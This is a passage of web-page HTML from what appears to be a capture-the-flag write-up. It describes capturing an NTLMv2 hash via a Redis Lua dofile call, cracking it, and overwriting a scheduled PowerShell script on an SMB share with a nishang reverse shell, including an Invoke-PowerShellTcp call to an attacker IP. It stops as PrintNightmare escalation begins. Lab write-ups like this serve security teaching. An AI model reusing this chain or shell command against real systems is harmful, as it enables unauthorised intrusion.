src="/static/fc04bb48e9cf7967dd857a21efbab964/1b0b6/responder.png" srcset="/static/fc04bb48e9cf7967dd857a21efbab964/dda05/responder.png 158w, /static/fc04bb48e9cf7967dd857a21efbab964/679a3/responder.png 315w, /static/fc04bb48e9cf7967dd857a21efbab964/1b0b6/responder.png 472w" sizes="(max-width: 472px) 100vw, 472px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The Redis <code class="language-text">eval</code> command is used to invoke the execution of Lua scripts, so I used it to run <code class="language-text">dofile</code> which tries to load and execute a file from the SMB server:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/36a3f35f5f221fdba961621acf484b61/c4923/lua-eval-dofile.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 12.025316455696203%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAfElEQVR42j3LYQ6CMAwFYC4jDhQCxKVb2cZAxCiI8f6HeRZi/PHl9bVpYtsHYr+C/RNOsJPsFvi4/uaX3GbE8YMwvMFhAclP2fSoLgMaPaLWVxR1FB0S4jt8mFFWAWQmaLohVQR1Yhxzu2eaG6gzi3aXFQ6HzMje/m198wVkl0IaSAi5nwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="lua eval dofile" title="" src="/static/36a3f35f5f221fdba961621acf484b61/50637/lua-eval-dofile.png" srcset="/static/36a3f35f5f221fdba961621acf484b61/dda05/lua-eval-dofile.png 158w, /static/36a3f35f5f221fdba961621acf484b61/679a3/lua-eval-dofile.png 315w, /static/36a3f35f5f221fdba961621acf484b61/50637/lua-eval-dofile.png 630w, /static/36a3f35f5f221fdba961621acf484b61/c4923/lua-eval-dofile.png 734w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>In order to retrieve the file from the server, an authentication was attempted, allowing for Responder to capture the NTLMv2 hash of <code class="language-text">enterprise-security</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/87a15bf459a0785c2b2e7cc0e361a32a/6ce55/ntlmv2-hash.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 32.278481012658226%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABEUlEQVR42oWRyVKEMBRF+RUtZVIakBYyM8jQDd0FLly49v+/4foS2irLjYtT975Ucl+S5/lZgyRvkBcNnlPjfPgk4Icl/KjEI3Hnl7gPqn9gDu+Bf0F0nxjHDcosaLvVhXdcYhACuhJgBUNVcLCjwOHAkKYMLxlHlnLkN7V1klCg4h1G02DSNXppMJkab0Ji1hJnJXHSFoGJ/CitVxjJL0ZhNpqwtXK1KgW8njHMklDccSZONugPS70Hz4YaaXUL3LFNrJpKwhs4w9ZIXI3AQgdWOmjV3nAxOxfiWisXdqG9ayuxtYpU473TTj96TS+kwKkZcExfEdHn/yYkAhpMEFW7J/3BDiuI96G5tZj2xLt+A1Klx+zqOkRgAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="NTLMv2 hash" title="" src="/static/87a15bf459a0785c2b2e7cc0e361a32a/50637/ntlmv2-hash.png" srcset="/static/87a15bf459a0785c2b2e7cc0e361a32a/dda05/ntlmv2-hash.png 158w, /static/87a15bf459a0785c2b2e7cc0e361a32a/679a3/ntlmv2-hash.png 315w, /static/87a15bf459a0785c2b2e7cc0e361a32a/50637/ntlmv2-hash.png 630w, /static/87a15bf459a0785c2b2e7cc0e361a32a/6ce55/ntlmv2-hash.png 745w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I saved the hash in a file called <code class="language-text">hash.txt</code> and used <code class="language-text">JtR</code> to crack it:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1e4a05109eca18d15f66ad724745b46c/f3121/crack-enterprise-security-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 52.53164556962025%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAACIUlEQVR42lVSa3OiQBDkp0S9nAo+IIo8lLcoAiKgxtQlxsv//xF9vUslVfehq3dnd3qnZ1bp6ylUq8JokeDF3cEOCjhhIdnyc5ibDNoiRG+4RH+8+sFgbJKXEgPV/IES5m/Ijm+IdxXW8RFRdoa/rRHsWkSHC9LyhmjPWNoiSBvGz/CSE0KeB9uTxCYuEfPumoUo1eUTZfuBffmKvLohr98lshO5+UB5/oS4kzd3FNwXZHFetHccBc535r/jdH0g3jdQyvYuBfOaCbwokiseCsHj+YHT65fcV9e/qG9fOF4ejH/iUDOneZeCRf1HxuKspWXa8JIKG9rwt4204tOGsCUsCrvxvu04uxBXpMUrkvyGHdsR7hroZgRjFWO68KH09T3GqwrqIobpZXDZP5dia7IdV7CiElM7wZPKYUxs9DQbT0MTvZEph9MbLeXAesMF+lwrdtTAT2r4ESe74ZTJDis22WCdU59YMSbidfKMwhqrUV98DGeuFPylWf9BcYMctneQdl3/AC/MWX4EnSKGve3YSojtDzTDx+8pBVnlQH4jU0J8JSUMMwR+CneTwiFCP4HlhNh4jHl7GE4KncJzS4jzr3KvvQRQKTrl/1QND9NlyJiH8dyFoq+2PIgwN2Mikc2dmZFMnnOts7qZ2VVr2CmTIxkT5wu2RDywXO+6u4QyW3ZiBoWH0zWeVRvPmoDT8cRhbzr+Xg/kvosJ69/9E7F/hXN7JxPMdEIAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="crack enterprise-security password" title="" src="/static/1e4a05109eca18d15f66ad724745b46c/50637/crack-enterprise-security-password.png" srcset="/static/1e4a05109eca18d15f66ad724745b46c/dda05/crack-enterprise-security-password.png 158w, /static/1e4a05109eca18d15f66ad724745b46c/679a3/crack-enterprise-security-password.png 315w, /static/1e4a05109eca18d15f66ad724745b46c/50637/crack-enterprise-security-password.png 630w, /static/1e4a05109eca18d15f66ad724745b46c/f3121/crack-enterprise-security-password.png 735w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The credentials granted read access to <code class="language-text">Enterprise-Share</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3ed1736f1860ad77df13f5c04560d5e8/e555d/list-shares.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 44.30379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB3klEQVR42j1RyZKbMBTkR3LI2NhmEyCBJDYDZrGdydiUJ7nlkP//iU7DVOXQVegh9evFcdUEN1/g2k8IM2OYX7jMnxhvv9EMC9rLB87tDSIp4YcWQVTgEJaIRIlU1kQFT9Q4pi1cP4Mjql9I9ARV3FC1D7QksfUPFPU7suKKflrQDw/iCVm8c9kLdffAufuAKWfkxYTEjEiJMKngpNULSg8kuG8/Y9UjSFoEcbNBl1ek+QhJuKqDyCd+z0gpIlQjvLSHx/ueaLA7KThu9Rf7k4Hg5Y7qGm6XmhuzC4ku+Pn8g358oekXVKZAbRv4cUerZwxljULlOPgGRuaQUQxH108E9O5FNWx1h6luiCWVMJOIaC/LNs8YSZtlMInCt73G7mDg+xpCGOx9i9HmKEnuaMP84gyHoERCuwnJAobsRysqxnBFQrUrYj4W0QqNKDQIibejxdvJsiQDj6U5gVmwP2Y4sbncMmQ7/VcXpme0/fNLYXlHk+U4U2VMwpIWZ5MxLsvsLGTMJVzmlLQiIwWV2C14mQ8I10Koci3FsixFF2sxBUm6PMP3w6pOb+fd8YuwURrJRqg71FKi5iBiW2JtLKxwCqpN9VrMppbzVUUqNG0aBIFmVHordEeoRHNm8A9HMicu0DDxxwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="list shares" title="" src="/static/3ed1736f1860ad77df13f5c04560d5e8/50637/list-shares.png" srcset="/static/3ed1736f1860ad77df13f5c04560d5e8/dda05/list-shares.png 158w, /static/3ed1736f1860ad77df13f5c04560d5e8/679a3/list-shares.png 315w, /static/3ed1736f1860ad77df13f5c04560d5e8/50637/list-shares.png 630w, /static/3ed1736f1860ad77df13f5c04560d5e8/e555d/list-shares.png 747w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The share contained a PowerShell script, so I downloaded it:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/838503326892acb710576b2d0f242b12/227c0/smbclient-enterprise-share.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 32.278481012658226%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABMUlEQVR42kWR6W7CMBCE8yyFksskzuHEOclhLlEBLX3/V5lODBU/RrNWdj/NbpwgMxDVHUFxRV6fYQ4PzJQ5/mKiD+Yb/XRDKHcIhEYSV4giDRlrhHyvXI21R3/J0fUJTXOCKmYsdaGPSNUMVR2Rl3vo5oyC9ae/DJb0t5b3W0+wI9MdItlDxB1cDrnBogobDqw2CkJ2TKEQ5xNKwqvuglwfUNPr/gtRMuCDff9gZ+MVT+C2sZ5kIyQVRh3WbgFfNPBCrpkOFpoWhvWIjOlj9rlhbYErlwHY76jSIGFzxjXb/gKz/0E/XjHtH9aH+Y6EoERN1uULuqQMohbBtkUY97b2RQtn4MFnQsb5hox3rNszlDaouF5ZnVDyrsH2mdKn+6K2Z/AJEvxRgjAhF2Bnv/8BW8jDyup4Y/EAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="smbclient Enterprise-Share" title="" src="/static/838503326892acb710576b2d0f242b12/50637/smbclient-enterprise-share.png" srcset="/static/838503326892acb710576b2d0f242b12/dda05/smbclient-enterprise-share.png 158w, /static/838503326892acb710576b2d0f242b12/679a3/smbclient-enterprise-share.png 315w, /static/838503326892acb710576b2d0f242b12/50637/smbclient-enterprise-share.png 630w, /static/838503326892acb710576b2d0f242b12/227c0/smbclient-enterprise-share.png 738w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">PurgeIrrelevantData_1826.ps1</code> looked to be a cleanup script for the <code class="language-text">C:\Users\Public\Documents</code> directory:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 556px; " > <a class="gatsby-resp-image-link" href="/static/1a2f09d0a5be369551526deb3d585ff1/9d173/cat-purge-irrelevant-data-script.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 11.39240506329114%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAiUlEQVR42h3LaQqCUABFYRfTgCjmkKa+TF+KWGplI5RBBNL+V3BSfxw+uHAVdSmZh2fs9M2m7hD5lf3pxb39cbx9uDw7mseXsmlx1wVie0BzEiaaz0wPmY4FY8Om6I7E8DJckSPiHVF/COISkVSjoawQssbyM1QzYuGlWKsMw5WYvcM+aPfqTswfM01FNyQpVGIAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="cat PurgeIrrelevantData_1826.ps1" title="" src="/static/1a2f09d0a5be369551526deb3d585ff1/9d173/cat-purge-irrelevant-data-script.png" srcset="/static/1a2f09d0a5be369551526deb3d585ff1/dda05/cat-purge-irrelevant-data-script.png 158w, /static/1a2f09d0a5be369551526deb3d585ff1/679a3/cat-purge-irrelevant-data-script.png 315w, /static/1a2f09d0a5be369551526deb3d585ff1/9d173/cat-purge-irrelevant-data-script.png 556w" sizes="(max-width: 556px) 100vw, 556px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>It's common for cleanup scripts to run as scheduled tasks, therefore, I figured that replacing it with a reverse shell script could result in a shell on the system.</p> <p>So I used a <a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1" target="_blank">nishang reverse shell</a> and wrote it into a file called <code class="language-text">PurgeIrrelevantData_1826.ps1</code> and added the <code class="language-text">Invoke-PowerShellTcp -Reverse -IPAddress 10.6.78.252 -Port 443</code> function call:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/78bcd6746011d569cbc549c76e0f0d16/dfb88/rev-shell-tcp-script.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 85.44303797468356%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAAC9ElEQVR42mVU2W7TUBDNPyCkSoBKnMT3eouXeI+zt0mAVoD4A97gga1sbRFtoX0ApPLJw5m5qVTah6OZO74+c2axW6/fHtGHr2f0+fiCvp39odOLS9jfdAL78eic3nw6gf1J776c0cHhD3qPu0env/D8L30/v6RjvHN4Ys4vXx1Qa2vbp7v3Heq6BQWDCemgJt2vyQkbcuMRKfhJuUNu1JCORmQ5OW3bKTAQ3H3g0p17WrD1MKCW7VfEcHE5yHcoKJfkw3rir8Q3513ykjG54VASqqCCHUpSjeQ2hPTA0+oiI8P2SiicUQxCNxrj5SkF2UJiPuABwQCxZEIekjt9iAhrgQ5KsnRKbZUZwo7OcKGhPl5QXkVOMCSFbFI+wL7tVZK05yI52tNzjLVx7jkp9XSCZKMrhQVIc4rzBRXNI6qn+5SWuxSlcwoBVhUiWZjOkHQiMQ899eOGAsCFQhctSMuFIbQglV8eL55RM92jvF5R2ayFNM7motgL0WO0wY/HQqagtmNn1GaonNq6oG0r3JSMYBBPhKyCwgzDSNHLCGR99I7Vc9I2ptrGhC3ctxSqcirquJWxeN6xIxDiMh9UAAXFChObkpMsyM92pflexJMdoSSUyMMKx7BTxCZYNSYrBZYdw+aG0EJWHsh8+YLGs6co/Tk1kz2U/Zjq0RP4+5RXK7Fhgj4mc5Q+u0EYGUJWp9GjAn0rhmuB9mpTlpSGUhQnzTcx47eBKzIu2ZJ2bEq2kSnBhLNqCbsjA7AdXg1G+R+6EqtgoU6X10h5SIMrwlJ2yvFrUceEvU1vWd1tFAIejKULUzIDfotVDKDO5WWGUhsP2GosMy+59ocChUS3IPEhFp7BX80YCjEQH98ir0tRr7EySzR9Sn2sEa+SH7GdinX7o82Ujd/nAWE4PCAPsbRaU8uBCgWVNuT2NugqUy63w6AwUMaXXnKpN1rAaIVQEWN5E3wpEf8I0L84XYgdYEAcY6Wihn8YUFthlRzsZUddS7bBP6sRJqbDVE0FAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="reverse shell tcp script" title="" src="/static/78bcd6746011d569cbc549c76e0f0d16/50637/rev-shell-tcp-script.png" srcset="/static/78bcd6746011d569cbc549c76e0f0d16/dda05/rev-shell-tcp-script.png 158w, /static/78bcd6746011d569cbc549c76e0f0d16/679a3/rev-shell-tcp-script.png 315w, /static/78bcd6746011d569cbc549c76e0f0d16/50637/rev-shell-tcp-script.png 630w, /static/78bcd6746011d569cbc549c76e0f0d16/dfb88/rev-shell-tcp-script.png 733w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Started a Netcat listener:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 405px; " > <a class="gatsby-resp-image-link" href="/static/bbde8c584c3397f16e5b97c5d711429f/0c99d/netcat.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 20.88607594936709%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA3ElEQVR42mWOYW+CMBiE+SuADmjVFamlyCgEF50TI5mbRuMHzf7/b7i9LcmyZB+e3KW53nveWJR4WqwQLm8IiovTUH9iPK+g6w6HrwfeDldHf75jf7o7/3H5Rr3use2vWO+OmOkWQSLhRbLFxBwxWXaYFhvyO2SmQ9nuwVKDNH8Fz2pw8jytkMwNYvECRho9l0jsmx010xhxBc+uyM07ZLmhRVsI1VLJCkVDB2QDQYVMVBTW8OMFrVAImILPBrWExIjlQ+E0a1zIjyR8qzGFYvX72WpI4X/wP7iygR9isYLFse5sEAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netcat" title="" src="/static/bbde8c584c3397f16e5b97c5d711429f/0c99d/netcat.png" srcset="/static/bbde8c584c3397f16e5b97c5d711429f/dda05/netcat.png 158w, /static/bbde8c584c3397f16e5b97c5d711429f/679a3/netcat.png 315w, /static/bbde8c584c3397f16e5b97c5d711429f/0c99d/netcat.png 405w" sizes="(max-width: 405px) 100vw, 405px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Within <code class="language-text">smbclient</code>, I overwrote the script with the reverse shell:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/04b5d0fd4ad08fede9cc63f0211031d7/adb42/overwrite-script.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 22.151898734177216%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA10lEQVR42jVP25aCMBDjVxRQESj0AkUKWG9ndXX//3OyGY8+5ExnmskkyRL/EOZfLPGFcbpjGO/wH/SHHzh/Q9XOaO0JjTlBSSWUiah1RNnM7M98H8k7IjGODYeVmpDmFuvMYpU5rHOHdNNhW45Itz32/Fc2QgufQi2rdhcUVUC688gKj7wYkOz2A5ReKBigedmSaLozry3ISaxZZamn48P0eKOj83F+wofH26EczESUSBQXXHeBpUhZB7j+CkNhiViKK7pRjCPOJHLDqMqwJ39DM1+hr+A/1keA7T/xpqkAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="overwrite script" title="" src="/static/04b5d0fd4ad08fede9cc63f0211031d7/50637/overwrite-script.png" srcset="/static/04b5d0fd4ad08fede9cc63f0211031d7/dda05/overwrite-script.png 158w, /static/04b5d0fd4ad08fede9cc63f0211031d7/679a3/overwrite-script.png 315w, /static/04b5d0fd4ad08fede9cc63f0211031d7/50637/overwrite-script.png 630w, /static/04b5d0fd4ad08fede9cc63f0211031d7/adb42/overwrite-script.png 741w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After about a minute, a connection was made as <code class="language-text">enterprise-security</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 607px; " > <a class="gatsby-resp-image-link" href="/static/c711eb9fc0cbc2daa9ec71f8d70a7209/281c2/rev-shell-enterprise-security.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 60.75949367088608%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACBklEQVR42m2T63KiQBCFeRUvIHcRkJsIiBI1CTFUtnbf/0nOnm6Nla3aH130NDOnvz4Dhhl3mCdvWGQ3WPkNXtqh7N5RHUbsTx+oTzfs+hF5c0XRXmFHO8ydFEt3iwXD9HMsvewZRlRdkLYjkv0FBUWK9g2b4oSAwqtwB3tdw5ecQk5Uc81aWPJZaczsRIXnjwZGO0w4j39Qk+L0+gsN10LUnCbmn6ScMLz/xp55M9zQvkzozhPq44j+OnEaAeiR7gb4yR7GOjsiqV4Q5SdEWY9kd9Y8LqV25EZOUJ2VWkLyMD3Ai2vEFArSRsdekVqeRlZf2O2DJJ/oL18k+CIt18eb+hYVA0XPPDxo4zWbihXO+u6l+vnTwyQ/ICNuRe9UiCOXzIvmFRUvp+hGbSbrIOlIUSDc9pDJLOZLN/tXcL6KYdqPYMEKKiVYBdX9AhhS+67LeukVvAy5BN6wRvYMY+ZkeotrGuqHOdy4oZdHGtzpeEIjnt2pevXXj1uOmv1f0OdmKyh1w5yfwNzawCSNfDZy0GPIQSHST4iN/KRV4sVT9IegdLfD6tFRRkl1s1CG24MKCIW8l1xIpZlAzOy74D0egiIm3mgneuNuGj3gRnvS3XOTdX3PS3Aeddln+pzMzZ6CEoblksjhqGaEBelkHKF+/iV6s6UeEkqpexQTK2SSby+/Rf8CZqSC9KWkadAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="reverse shell as enterprise-security" title="" src="/static/c711eb9fc0cbc2daa9ec71f8d70a7209/281c2/rev-shell-enterprise-security.png" srcset="/static/c711eb9fc0cbc2daa9ec71f8d70a7209/dda05/rev-shell-enterprise-security.png 158w, /static/c711eb9fc0cbc2daa9ec71f8d70a7209/679a3/rev-shell-enterprise-security.png 315w, /static/c711eb9fc0cbc2daa9ec71f8d70a7209/281c2/rev-shell-enterprise-security.png 607w" sizes="(max-width: 607px) 100vw, 607px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>While looking for paths to escalate privileges, I listed the services:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 534px; " > <a class="gatsby-resp-image-link" href="/static/00b198936dedc36a24feb4dc0f29c61c/9fb2a/list-services.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 56.9620253164557%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAACH0lEQVR42kVTV3bbMBDUUWRbtirV2DvBIpKSqB6Xl3wk9z/EeLCWnY99IIHdwezMomdYGWZmhrmtsHQKWeeOwtRMGYl8r7wCK7/A2sthcM+wuG/zfBXzO5V4nrkYTB305nYOK9hww4cTt7L2hxYeJw76IwujZQw7buCmLc9rKXocWxJPExsD5snKfQH0VYdq9wqToJvuHXbUYDDzmOSyyIFBhllzQVQeoLgG2Q5x2SGujrDCSmKyCpn7BdrTAHlzw9qv4CZbzC1FCVJhqgFnpiLYkQy3CItOctykRaB2ZLxh6xlMyjFdx8K052UdDre/cAhckqlqrkjKkxRqlkuvwvb0W/YynlX7N4J1culkGWK0CCSGhve/ZV1g3wE33QcPA9GxP7SxdEvUhw9E+QFxcURaX/j/jnL/igXZfbf6o6EVsuX2xsIC2eYCVV8FfLpOBFSbptn56Z7M9tSspqtKpuF56jHHxMPI/DGmFxYnnN/+wWOL2/MftvRO4fcYL2IBNIMaLRkWW7Jnu9o4LYciCdOv5AI3aSjBXUM7alHwcEWGUX6kgycaVIpJBudzwdks2l+iW6LNIZgG0XUrr0REGZyoxsu3hi5tr7dXWBxeRX2042l1kpYfRjaLKpRkpzVMqjO8dCeSLEjgxfAZgeQ9jb9mshfmHZrdDbankOZMDgq+mPw+4La4rC8JCZjxQtGZbmd3rU1fPwqPD4EvZeLiE8Xwc4fmMdicAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="list services" title="" src="/static/00b198936dedc36a24feb4dc0f29c61c/9fb2a/list-services.png" srcset="/static/00b198936dedc36a24feb4dc0f29c61c/dda05/list-services.png 158w, /static/00b198936dedc36a24feb4dc0f29c61c/679a3/list-services.png 315w, /static/00b198936dedc36a24feb4dc0f29c61c/9fb2a/list-services.png 534w" sizes="(max-width: 534px) 100vw, 534px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Print Spooler was running which meant that the system was potentially vulnerable to PrintNightmare:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 557px; " > <a class="gatsby-resp-image-link" href="/static/723d856be9aab1fe58c8abab240eb09a/fdbc5/print-spooler-service.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.177215189873415%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABdklEQVR42iVR2XaCQBTjU7RWqYJHZZNtkE0QUaxWa9v//480c33ImQOTyU1yjay+oDx8wY8blN0dh+EXeXODF+1hLmPExVm+03JA0d6gqgtSIqs/EaQdVkEFN6zwbgUCw0tqqLLH0suQVAPC4oTZKoW5VpjYMfxdj7A8w8uOPAfhaNGCJrykxdSOMDI9vC+2BAV7Tr0NTyTbHD/XX/TNBTYv5iR9EEe6Ph0faCgShzWCoMTSL7Cms/W2guVkmGgxKxRR4xnXuCcNzv4OP1mLznah3ixkMwdqusE1LPGtWuE8yE0cJe5HM1ecjUwfb/MA47kvwka6v6IZ/rDRHfZPqP0nppaPsckHJESMqf8ndJh3D2TNVeJKt0znsOvFRhEvp4YufN9/w2cf1eEuxbskuYw3taJXX+2XLKZm9JgdF+SVRKA66XHp5pizd4m8Zdk7Tl2xmyg/yakjTBahTPTTA+9v8lhv12USmwKWsxNXmq8XM/54Rf4HCaTuZ6+PQhUAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Print Spooler service" title="" src="/static/723d856be9aab1fe58c8abab240eb09a/fdbc5/print-spooler-service.png" srcset="/static/723d856be9aab1fe58c8abab240eb09a/dda05/print-spooler-service.png 158w, /static/723d856be9aab1fe58c8abab240eb09a/679a3/print-spooler-service.png 315w, /static/723d856be9aab1fe58c8abab240eb09a/fdbc5/print-spooler-service.png 557w" sizes="(max-width: 557px) 100vw, 557px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I cloned <a href="https://github.com/cube0x0/CVE-2021-1675" target="_blank">this PoC</a> for PrintNightmare (CVE-2021-1675) which also required <a href="https://github.com/cube0x0/impacket" target="_blank">this</a> version of Impacket as stated in the GitHub README. Then, I copied <code class="language-text">smbserver.py</code> into the same directory as the exploit:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e891808377aa53258e6a7f3bafaee368/e899a/cve-2021-1675.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 58.86075949367089%; position: relative; bottom: 0; left: 0; background-image: 